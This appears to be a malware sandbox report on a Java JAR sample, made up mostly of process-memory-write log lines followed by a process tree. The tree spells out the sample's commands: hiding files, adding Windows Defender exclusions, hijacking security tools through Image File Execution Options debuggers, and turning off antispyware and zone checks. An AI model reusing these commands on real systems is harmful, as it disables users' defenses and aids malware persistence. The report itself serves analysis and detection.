PID 2928 wrote to memory of 2940	2928	cmd.exe	192
PID 2928 wrote to memory of 2940	2928	cmd.exe	192
PID 2928 wrote to memory of 2940	2928	cmd.exe	192
PID 2928 wrote to memory of 2952	2928	cmd.exe	193
PID 2928 wrote to memory of 2952	2928	cmd.exe	193
PID 2928 wrote to memory of 2952	2928	cmd.exe	193
PID 1432 wrote to memory of 2964	1432	java.exe	194
PID 1432 wrote to memory of 2964	1432	java.exe	194
PID 1432 wrote to memory of 2964	1432	java.exe	194
PID 2964 wrote to memory of 2976	2964	cmd.exe	195
PID 2964 wrote to memory of 2976	2964	cmd.exe	195
PID 2964 wrote to memory of 2976	2964	cmd.exe	195
PID 1432 wrote to memory of 2988	1432	java.exe	196
PID 1432 wrote to memory of 2988	1432	java.exe	196
PID 1432 wrote to memory of 2988	1432	java.exe	196
PID 2964 wrote to memory of 3000	2964	cmd.exe	197
PID 2964 wrote to memory of 3000	2964	cmd.exe	197
PID 2964 wrote to memory of 3000	2964	cmd.exe	197
PID 1432 wrote to memory of 3028	1432	java.exe	199
PID 1432 wrote to memory of 3028	1432	java.exe	199
PID 1432 wrote to memory of 3028	1432	java.exe	199
PID 3028 wrote to memory of 3052	3028	cmd.exe	200
PID 3028 wrote to memory of 3052	3028	cmd.exe	200
PID 3028 wrote to memory of 3052	3028	cmd.exe	200
PID 3028 wrote to memory of 2052	3028	cmd.exe	201
PID 3028 wrote to memory of 2052	3028	cmd.exe	201
PID 3028 wrote to memory of 2052	3028	cmd.exe	201
PID 1432 wrote to memory of 2064	1432	java.exe	202
PID 1432 wrote to memory of 2064	1432	java.exe	202
PID 1432 wrote to memory of 2064	1432	java.exe	202
PID 2064 wrote to memory of 2088	2064	cmd.exe	203
PID 2064 wrote to memory of 2088	2064	cmd.exe	203
PID 2064 wrote to memory of 2088	2064	cmd.exe	203
PID 2064 wrote to memory of 860	2064	cmd.exe	204
PID 2064 wrote to memory of 860	2064	cmd.exe	204
PID 2064 wrote to memory of 860	2064	cmd.exe	204
PID 1432 wrote to memory of 820	1432	java.exe	205
PID 1432 wrote to memory of 820	1432	java.exe	205
PID 1432 wrote to memory of 820	1432	java.exe	205
PID 820 wrote to memory of 1648	820	cmd.exe	206
PID 820 wrote to memory of 1648	820	cmd.exe	206
PID 820 wrote to memory of 1648	820	cmd.exe	206
PID 820 wrote to memory of 2156	820	cmd.exe	207
PID 820 wrote to memory of 2156	820	cmd.exe	207
PID 820 wrote to memory of 2156	820	cmd.exe	207
PID 1432 wrote to memory of 1764	1432	java.exe	208
PID 1432 wrote to memory of 1764	1432	java.exe	208
PID 1432 wrote to memory of 1764	1432	java.exe	208
PID 1764 wrote to memory of 1836	1764	cmd.exe	209
PID 1764 wrote to memory of 1836	1764	cmd.exe	209
PID 1764 wrote to memory of 1836	1764	cmd.exe	209
PID 1764 wrote to memory of 1900	1764	cmd.exe	210
PID 1764 wrote to memory of 1900	1764	cmd.exe	210
PID 1764 wrote to memory of 1900	1764	cmd.exe	210
PID 1432 wrote to memory of 2144	1432	java.exe	211
PID 1432 wrote to memory of 2144	1432	java.exe	211
PID 1432 wrote to memory of 2144	1432	java.exe	211
PID 2144 wrote to memory of 1964	2144	cmd.exe	212
PID 2144 wrote to memory of 1964	2144	cmd.exe	212
PID 2144 wrote to memory of 1964	2144	cmd.exe	212
PID 2144 wrote to memory of 1848	2144	cmd.exe	213
PID 2144 wrote to memory of 1848	2144	cmd.exe	213
PID 2144 wrote to memory of 1848	2144	cmd.exe	213
PID 1432 wrote to memory of 1908	1432	java.exe	214
PID 1432 wrote to memory of 1908	1432	java.exe	214
PID 1432 wrote to memory of 1908	1432	java.exe	214
PID 1908 wrote to memory of 2180	1908	cmd.exe	215
PID 1908 wrote to memory of 2180	1908	cmd.exe	215
PID 1908 wrote to memory of 2180	1908	cmd.exe	215
PID 1908 wrote to memory of 2196	1908	cmd.exe	216
PID 1908 wrote to memory of 2196	1908	cmd.exe	216
PID 1908 wrote to memory of 2196	1908	cmd.exe	216
PID 1432 wrote to memory of 2188	1432	java.exe	217
PID 1432 wrote to memory of 2188	1432	java.exe	217
PID 1432 wrote to memory of 2188	1432	java.exe	217
PID 2188 wrote to memory of 1792	2188	cmd.exe	218
PID 2188 wrote to memory of 1792	2188	cmd.exe	218
PID 2188 wrote to memory of 1792	2188	cmd.exe	218
PID 2188 wrote to memory of 608	2188	cmd.exe	219
PID 2188 wrote to memory of 608	2188	cmd.exe	219
PID 2188 wrote to memory of 608	2188	cmd.exe	219
PID 1432 wrote to memory of 1772	1432	java.exe	220
PID 1432 wrote to memory of 1772	1432	java.exe	220
PID 1432 wrote to memory of 1772	1432	java.exe	220
PID 1772 wrote to memory of 1844	1772	cmd.exe	221
PID 1772 wrote to memory of 1844	1772	cmd.exe	221
PID 1772 wrote to memory of 1844	1772	cmd.exe	221
PID 1772 wrote to memory of 1860	1772	cmd.exe	222
PID 1772 wrote to memory of 1860	1772	cmd.exe	222
PID 1772 wrote to memory of 1860	1772	cmd.exe	222
PID 1432 wrote to memory of 1840	1432	java.exe	223
PID 1432 wrote to memory of 1840	1432	java.exe	223
PID 1432 wrote to memory of 1840	1432	java.exe	223
PID 1840 wrote to memory of 2220	1840	cmd.exe	224
PID 1840 wrote to memory of 2220	1840	cmd.exe	224
PID 1840 wrote to memory of 2220	1840	cmd.exe	224
PID 1840 wrote to memory of 1604	1840	cmd.exe	225
PID 1840 wrote to memory of 1604	1840	cmd.exe	225
PID 1840 wrote to memory of 1604	1840	cmd.exe	225
PID 1432 wrote to memory of 1988	1432	java.exe	226
PID 1432 wrote to memory of 1988	1432	java.exe	226
PID 1432 wrote to memory of 1988	1432	java.exe	226
PID 1988 wrote to memory of 1704	1988	cmd.exe	227
PID 1988 wrote to memory of 1704	1988	cmd.exe	227
PID 1988 wrote to memory of 1704	1988	cmd.exe	227
PID 1988 wrote to memory of 2216	1988	cmd.exe	228
PID 1988 wrote to memory of 2216	1988	cmd.exe	228
PID 1988 wrote to memory of 2216	1988	cmd.exe	228
PID 1432 wrote to memory of 2244	1432	java.exe	229
PID 1432 wrote to memory of 2244	1432	java.exe	229
PID 1432 wrote to memory of 2244	1432	java.exe	229
PID 2244 wrote to memory of 2268	2244	cmd.exe	230
PID 2244 wrote to memory of 2268	2244	cmd.exe	230
PID 2244 wrote to memory of 2268	2244	cmd.exe	230
PID 2244 wrote to memory of 2300	2244	cmd.exe	231
PID 2244 wrote to memory of 2300	2244	cmd.exe	231
PID 2244 wrote to memory of 2300	2244	cmd.exe	231
PID 1432 wrote to memory of 2288	1432	java.exe	232
PID 1432 wrote to memory of 2288	1432	java.exe	232
PID 1432 wrote to memory of 2288	1432	java.exe	232
PID 2288 wrote to memory of 2316	2288	cmd.exe	233
PID 2288 wrote to memory of 2316	2288	cmd.exe	233
PID 2288 wrote to memory of 2316	2288	cmd.exe	233
PID 2288 wrote to memory of 2348	2288	cmd.exe	234
PID 2288 wrote to memory of 2348	2288	cmd.exe	234
PID 2288 wrote to memory of 2348	2288	cmd.exe	234
PID 1432 wrote to memory of 2340	1432	java.exe	235
PID 1432 wrote to memory of 2340	1432	java.exe	235
PID 1432 wrote to memory of 2340	1432	java.exe	235
PID 2340 wrote to memory of 2384	2340	cmd.exe	236
PID 2340 wrote to memory of 2384	2340	cmd.exe	236
PID 2340 wrote to memory of 2384	2340	cmd.exe	236
PID 1432 wrote to memory of 2400	1432	java.exe	237
PID 1432 wrote to memory of 2400	1432	java.exe	237
PID 1432 wrote to memory of 2400	1432	java.exe	237
PID 2340 wrote to memory of 2332	2340	cmd.exe	239
PID 2340 wrote to memory of 2332	2340	cmd.exe	239
PID 2340 wrote to memory of 2332	2340	cmd.exe	239
PID 1432 wrote to memory of 2368	1432	java.exe	240
PID 1432 wrote to memory of 2368	1432	java.exe	240
PID 1432 wrote to memory of 2368	1432	java.exe	240
PID 2368 wrote to memory of 2416	2368	cmd.exe	241
PID 2368 wrote to memory of 2416	2368	cmd.exe	241
PID 2368 wrote to memory of 2416	2368	cmd.exe	241
PID 2368 wrote to memory of 2464	2368	cmd.exe	242
PID 2368 wrote to memory of 2464	2368	cmd.exe	242
PID 2368 wrote to memory of 2464	2368	cmd.exe	242
PID 1432 wrote to memory of 2476	1432	java.exe	243
PID 1432 wrote to memory of 2476	1432	java.exe	243
PID 1432 wrote to memory of 2476	1432	java.exe	243
PID 2476 wrote to memory of 2456	2476	cmd.exe	244
PID 2476 wrote to memory of 2456	2476	cmd.exe	244
PID 2476 wrote to memory of 2456	2476	cmd.exe	244
PID 2476 wrote to memory of 2496	2476	cmd.exe	245
PID 2476 wrote to memory of 2496	2476	cmd.exe	245
PID 2476 wrote to memory of 2496	2476	cmd.exe	245
PID 1432 wrote to memory of 2524	1432	java.exe	246
PID 1432 wrote to memory of 2524	1432	java.exe	246
PID 1432 wrote to memory of 2524	1432	java.exe	246
PID 2524 wrote to memory of 2512	2524	cmd.exe	247
PID 2524 wrote to memory of 2512	2524	cmd.exe	247
PID 2524 wrote to memory of 2512	2524	cmd.exe	247
PID 2524 wrote to memory of 2548	2524	cmd.exe	248
PID 2524 wrote to memory of 2548	2524	cmd.exe	248
PID 2524 wrote to memory of 2548	2524	cmd.exe	248
PID 1432 wrote to memory of 2564	1432	java.exe	249
PID 1432 wrote to memory of 2564	1432	java.exe	249
PID 1432 wrote to memory of 2564	1432	java.exe	249
PID 2564 wrote to memory of 2576	2564	cmd.exe	250
PID 2564 wrote to memory of 2576	2564	cmd.exe	250
PID 2564 wrote to memory of 2576	2564	cmd.exe	250
PID 2564 wrote to memory of 1796	2564	cmd.exe	251
PID 2564 wrote to memory of 1796	2564	cmd.exe	251
PID 2564 wrote to memory of 1796	2564	cmd.exe	251
PID 1432 wrote to memory of 2584	1432	java.exe	252
PID 1432 wrote to memory of 2584	1432	java.exe	252
PID 1432 wrote to memory of 2584	1432	java.exe	252
PID 2584 wrote to memory of 2624	2584	cmd.exe	253
PID 2584 wrote to memory of 2624	2584	cmd.exe	253
PID 2584 wrote to memory of 2624	2584	cmd.exe	253
PID 2584 wrote to memory of 2636	2584	cmd.exe	254
PID 2584 wrote to memory of 2636	2584	cmd.exe	254
PID 2584 wrote to memory of 2636	2584	cmd.exe	254
PID 1432 wrote to memory of 2652	1432	java.exe	255
PID 1432 wrote to memory of 2652	1432	java.exe	255
PID 1432 wrote to memory of 2652	1432	java.exe	255
PID 2652 wrote to memory of 2648	2652	cmd.exe	256
PID 2652 wrote to memory of 2648	2652	cmd.exe	256
PID 2652 wrote to memory of 2648	2652	cmd.exe	256
PID 2652 wrote to memory of 2672	2652	cmd.exe	257
PID 2652 wrote to memory of 2672	2652	cmd.exe	257
PID 2652 wrote to memory of 2672	2652	cmd.exe	257
PID 1432 wrote to memory of 2708	1432	java.exe	258
PID 1432 wrote to memory of 2708	1432	java.exe	258
PID 1432 wrote to memory of 2708	1432	java.exe	258
PID 2708 wrote to memory of 2704	2708	cmd.exe	259
PID 2708 wrote to memory of 2704	2708	cmd.exe	259
PID 2708 wrote to memory of 2704	2708	cmd.exe	259
PID 2708 wrote to memory of 2664	2708	cmd.exe	260
PID 2708 wrote to memory of 2664	2708	cmd.exe	260
PID 2708 wrote to memory of 2664	2708	cmd.exe	260
PID 1432 wrote to memory of 2680	1432	java.exe	261
PID 1432 wrote to memory of 2680	1432	java.exe	261
PID 1432 wrote to memory of 2680	1432	java.exe	261
PID 2680 wrote to memory of 2592	2680	cmd.exe	262
PID 2680 wrote to memory of 2592	2680	cmd.exe	262
PID 2680 wrote to memory of 2592	2680	cmd.exe	262
PID 2680 wrote to memory of 2724	2680	cmd.exe	263
PID 2680 wrote to memory of 2724	2680	cmd.exe	263
PID 2680 wrote to memory of 2724	2680	cmd.exe	263
PID 1432 wrote to memory of 2752	1432	java.exe	264
PID 1432 wrote to memory of 2752	1432	java.exe	264
PID 1432 wrote to memory of 2752	1432	java.exe	264
PID 2752 wrote to memory of 2776	2752	cmd.exe	265
PID 2752 wrote to memory of 2776	2752	cmd.exe	265
PID 2752 wrote to memory of 2776	2752	cmd.exe	265
PID 2752 wrote to memory of 2768	2752	cmd.exe	266
PID 2752 wrote to memory of 2768	2752	cmd.exe	266
PID 2752 wrote to memory of 2768	2752	cmd.exe	266
PID 1432 wrote to memory of 1096	1432	java.exe	267
PID 1432 wrote to memory of 1096	1432	java.exe	267
PID 1432 wrote to memory of 1096	1432	java.exe	267
PID 1096 wrote to memory of 1252	1096	cmd.exe	268
PID 1096 wrote to memory of 1252	1096	cmd.exe	268
PID 1096 wrote to memory of 1252	1096	cmd.exe	268
PID 1096 wrote to memory of 700	1096	cmd.exe	269
PID 1096 wrote to memory of 700	1096	cmd.exe	269
PID 1096 wrote to memory of 700	1096	cmd.exe	269
PID 1432 wrote to memory of 628	1432	java.exe	270
PID 1432 wrote to memory of 628	1432	java.exe	270
PID 1432 wrote to memory of 628	1432	java.exe	270
PID 628 wrote to memory of 1080	628	cmd.exe	271
PID 628 wrote to memory of 1080	628	cmd.exe	271
PID 628 wrote to memory of 1080	628	cmd.exe	271
PID 628 wrote to memory of 2748	628	cmd.exe	272
PID 628 wrote to memory of 2748	628	cmd.exe	272
PID 628 wrote to memory of 2748	628	cmd.exe	272
PID 1432 wrote to memory of 2500	1432	java.exe	273
PID 1432 wrote to memory of 2500	1432	java.exe	273
PID 1432 wrote to memory of 2500	1432	java.exe	273
PID 2500 wrote to memory of 2688	2500	cmd.exe	274
PID 2500 wrote to memory of 2688	2500	cmd.exe	274
PID 2500 wrote to memory of 2688	2500	cmd.exe	274
PID 2500 wrote to memory of 2308	2500	cmd.exe	275
PID 2500 wrote to memory of 2308	2500	cmd.exe	275
PID 2500 wrote to memory of 2308	2500	cmd.exe	275
PID 1432 wrote to memory of 2204	1432	java.exe	276
PID 1432 wrote to memory of 2204	1432	java.exe	276
PID 1432 wrote to memory of 2204	1432	java.exe	276
PID 2204 wrote to memory of 2540	2204	cmd.exe	277
PID 2204 wrote to memory of 2540	2204	cmd.exe	277
PID 2204 wrote to memory of 2540	2204	cmd.exe	277
PID 2204 wrote to memory of 2448	2204	cmd.exe	278
PID 2204 wrote to memory of 2448	2204	cmd.exe	278
PID 2204 wrote to memory of 2448	2204	cmd.exe	278
PID 1432 wrote to memory of 1400	1432	java.exe	279
PID 1432 wrote to memory of 1400	1432	java.exe	279
PID 1432 wrote to memory of 1400	1432	java.exe	279
PID 1400 wrote to memory of 652	1400	cmd.exe	280
PID 1400 wrote to memory of 652	1400	cmd.exe	280
PID 1400 wrote to memory of 652	1400	cmd.exe	280
PID 1400 wrote to memory of 2248	1400	cmd.exe	281
PID 1400 wrote to memory of 2248	1400	cmd.exe	281
PID 1400 wrote to memory of 2248	1400	cmd.exe	281
PID 1432 wrote to memory of 1596	1432	java.exe	282
PID 1432 wrote to memory of 1596	1432	java.exe	282
PID 1432 wrote to memory of 1596	1432	java.exe	282
PID 1432 wrote to memory of 392	1432	java.exe	283
PID 1432 wrote to memory of 392	1432	java.exe	283
PID 1432 wrote to memory of 392	1432	java.exe	283
PID 392 wrote to memory of 1120	392	cmd.exe	285
PID 392 wrote to memory of 1120	392	cmd.exe	285
PID 392 wrote to memory of 1120	392	cmd.exe	285
PID 392 wrote to memory of 2160	392	cmd.exe	286
PID 392 wrote to memory of 2160	392	cmd.exe	286
PID 392 wrote to memory of 2160	392	cmd.exe	286
PID 1432 wrote to memory of 1048	1432	java.exe	287
PID 1432 wrote to memory of 1048	1432	java.exe	287
PID 1432 wrote to memory of 1048	1432	java.exe	287
PID 1048 wrote to memory of 1088	1048	cmd.exe	288
PID 1048 wrote to memory of 1088	1048	cmd.exe	288
PID 1048 wrote to memory of 1088	1048	cmd.exe	288
PID 1048 wrote to memory of 2788	1048	cmd.exe	289
PID 1048 wrote to memory of 2788	1048	cmd.exe	289
PID 1048 wrote to memory of 2788	1048	cmd.exe	289
PID 1432 wrote to memory of 2816	1432	java.exe	290
PID 1432 wrote to memory of 2816	1432	java.exe	290
PID 1432 wrote to memory of 2816	1432	java.exe	290
PID 2816 wrote to memory of 2808	2816	cmd.exe	291
PID 2816 wrote to memory of 2808	2816	cmd.exe	291
PID 2816 wrote to memory of 2808	2816	cmd.exe	291
PID 2816 wrote to memory of 2836	2816	cmd.exe	292
PID 2816 wrote to memory of 2836	2816	cmd.exe	292
PID 2816 wrote to memory of 2836	2816	cmd.exe	292
PID 1432 wrote to memory of 2848	1432	java.exe	293
PID 1432 wrote to memory of 2848	1432	java.exe	293
PID 1432 wrote to memory of 2848	1432	java.exe	293
PID 2848 wrote to memory of 2876	2848	cmd.exe	294
PID 2848 wrote to memory of 2876	2848	cmd.exe	294
PID 2848 wrote to memory of 2876	2848	cmd.exe	294
PID 2848 wrote to memory of 2868	2848	cmd.exe	295
PID 2848 wrote to memory of 2868	2848	cmd.exe	295
PID 2848 wrote to memory of 2868	2848	cmd.exe	295
PID 1432 wrote to memory of 2900	1432	java.exe	296
PID 1432 wrote to memory of 2900	1432	java.exe	296
PID 1432 wrote to memory of 2900	1432	java.exe	296
PID 2900 wrote to memory of 2924	2900	cmd.exe	297
PID 2900 wrote to memory of 2924	2900	cmd.exe	297
PID 2900 wrote to memory of 2924	2900	cmd.exe	297
PID 2900 wrote to memory of 2916	2900	cmd.exe	298
PID 2900 wrote to memory of 2916	2900	cmd.exe	298
PID 2900 wrote to memory of 2916	2900	cmd.exe	298
PID 1432 wrote to memory of 2944	1432	java.exe	299
PID 1432 wrote to memory of 2944	1432	java.exe	299
PID 1432 wrote to memory of 2944	1432	java.exe	299
PID 2944 wrote to memory of 2956	2944	cmd.exe	300
PID 2944 wrote to memory of 2956	2944	cmd.exe	300
PID 2944 wrote to memory of 2956	2944	cmd.exe	300
PID 2944 wrote to memory of 2984	2944	cmd.exe	301
PID 2944 wrote to memory of 2984	2944	cmd.exe	301
PID 2944 wrote to memory of 2984	2944	cmd.exe	301
PID 1432 wrote to memory of 3016	1432	java.exe	302
PID 1432 wrote to memory of 3016	1432	java.exe	302
PID 1432 wrote to memory of 3016	1432	java.exe	302
PID 3016 wrote to memory of 3004	3016	cmd.exe	303
PID 3016 wrote to memory of 3004	3016	cmd.exe	303
PID 3016 wrote to memory of 3004	3016	cmd.exe	303
PID 3016 wrote to memory of 3060	3016	cmd.exe	304
PID 3016 wrote to memory of 3060	3016	cmd.exe	304
PID 3016 wrote to memory of 3060	3016	cmd.exe	304
PID 1432 wrote to memory of 2060	1432	java.exe	305
PID 1432 wrote to memory of 2060	1432	java.exe	305
PID 1432 wrote to memory of 2060	1432	java.exe	305
PID 2060 wrote to memory of 3024	2060	cmd.exe	306
PID 2060 wrote to memory of 3024	2060	cmd.exe	306
PID 2060 wrote to memory of 3024	2060	cmd.exe	306
PID 2060 wrote to memory of 2992	2060	cmd.exe	307
PID 2060 wrote to memory of 2992	2060	cmd.exe	307
PID 2060 wrote to memory of 2992	2060	cmd.exe	307
PID 1432 wrote to memory of 3012	1432	java.exe	308
PID 1432 wrote to memory of 3012	1432	java.exe	308
PID 1432 wrote to memory of 3012	1432	java.exe	308
PID 3012 wrote to memory of 2052	3012	cmd.exe	309
PID 3012 wrote to memory of 2052	3012	cmd.exe	309
PID 3012 wrote to memory of 2052	3012	cmd.exe	309
PID 3012 wrote to memory of 2136	3012	cmd.exe	310
PID 3012 wrote to memory of 2136	3012	cmd.exe	310
PID 3012 wrote to memory of 2136	3012	cmd.exe	310
PID 1432 wrote to memory of 2116	1432	java.exe	311
PID 1432 wrote to memory of 2116	1432	java.exe	311
PID 1432 wrote to memory of 2116	1432	java.exe	311
PID 2116 wrote to memory of 1336	2116	cmd.exe	312
PID 2116 wrote to memory of 1336	2116	cmd.exe	312
PID 2116 wrote to memory of 1336	2116	cmd.exe	312
PID 2116 wrote to memory of 1648	2116	cmd.exe	313
PID 2116 wrote to memory of 1648	2116	cmd.exe	313
PID 2116 wrote to memory of 1648	2116	cmd.exe	313
PID 1432 wrote to memory of 1940	1432	java.exe	314
PID 1432 wrote to memory of 1940	1432	java.exe	314
PID 1432 wrote to memory of 1940	1432	java.exe	314
PID 1940 wrote to memory of 2148	1940	cmd.exe	315
PID 1940 wrote to memory of 2148	1940	cmd.exe	315
PID 1940 wrote to memory of 2148	1940	cmd.exe	315
PID 1940 wrote to memory of 1900	1940	cmd.exe	316
PID 1940 wrote to memory of 1900	1940	cmd.exe	316
PID 1940 wrote to memory of 1900	1940	cmd.exe	316
PID 1432 wrote to memory of 2172	1432	java.exe	317
PID 1432 wrote to memory of 2172	1432	java.exe	317
PID 1432 wrote to memory of 2172	1432	java.exe	317
PID 2172 wrote to memory of 268	2172	cmd.exe	318
PID 2172 wrote to memory of 268	2172	cmd.exe	318
PID 2172 wrote to memory of 268	2172	cmd.exe	318
PID 2172 wrote to memory of 2184	2172	cmd.exe	319
PID 2172 wrote to memory of 2184	2172	cmd.exe	319
PID 2172 wrote to memory of 2184	2172	cmd.exe	319
PID 1432 wrote to memory of 2176	1432	java.exe	320
PID 1432 wrote to memory of 2176	1432	java.exe	320
PID 1432 wrote to memory of 2176	1432	java.exe	320
PID 1432 wrote to memory of 560	1432	java.exe	322
PID 1432 wrote to memory of 560	1432	java.exe	322
PID 1432 wrote to memory of 560	1432	java.exe	322
PID 1432 wrote to memory of 1564	1432	java.exe	324
PID 1432 wrote to memory of 1564	1432	java.exe	324
PID 1432 wrote to memory of 1564	1432	java.exe	324
PID 1432 wrote to memory of 2324	1432	java.exe	326
PID 1432 wrote to memory of 2324	1432	java.exe	326
PID 1432 wrote to memory of 2324	1432	java.exe	326
PID 1432 wrote to memory of 2384	1432	java.exe	328
PID 1432 wrote to memory of 2384	1432	java.exe	328
PID 1432 wrote to memory of 2384	1432	java.exe	328
PID 1432 wrote to memory of 2400	1432	java.exe	330
PID 1432 wrote to memory of 2400	1432	java.exe	330
PID 1432 wrote to memory of 2400	1432	java.exe	330

Views/modifies file attributes 1 TTPs 8 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
628	attrib.exe
968	attrib.exe
1244	attrib.exe
700	attrib.exe
1524	attrib.exe
1332	attrib.exe
1776	attrib.exe
520	attrib.exe

C:\Windows\system32\java.exe
java -jar C:\Users\Admin\AppData\Local\Temp\REN42159.jar
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1432
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1084
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1112
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1536
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1252
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1792
- C:\Windows\system32\attrib.exe
  attrib +h C:\Users\Admin\Oracle
  2⤵
  - Views/modifies file attributes
  PID:1776
- C:\Windows\system32\attrib.exe
  attrib +h +r +s C:\Users\Admin\.ntusernt.ini
  2⤵
  - Views/modifies file attributes
  PID:520
- C:\Windows\system32\attrib.exe
  attrib -s -r C:\Users\Admin\tHFwB\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:628
- C:\Windows\system32\attrib.exe
  attrib +s +r C:\Users\Admin\tHFwB\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:968
- C:\Windows\system32\attrib.exe
  attrib -s -r C:\Users\Admin\tHFwB
  2⤵
  - Views/modifies file attributes
  PID:1244
- C:\Windows\system32\attrib.exe
  attrib +s +r C:\Users\Admin\tHFwB
  2⤵
  - Views/modifies file attributes
  PID:700
- C:\Windows\system32\attrib.exe
  attrib +h C:\Users\Admin\tHFwB
  2⤵
  - Views/modifies file attributes
  PID:1524
- C:\Windows\system32\attrib.exe
  attrib +h +s +r C:\Users\Admin\tHFwB\YIYZS.class
  2⤵
  - Views/modifies file attributes
  PID:1332
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1684
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:2004
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:1532
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\tHFwB','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\tHFwB\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1568
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1944
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f
  2⤵
  PID:1952
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1924
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f
  2⤵
  PID:1984
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1968
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f
  2⤵
  PID:2024
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1296
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f
  2⤵
  PID:848
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  2⤵
  PID:1032
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1464
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  2⤵
  PID:1804
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1792
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:1064
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1416
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1656
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:1704
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:1960
- C:\Windows\System32\reg.exe
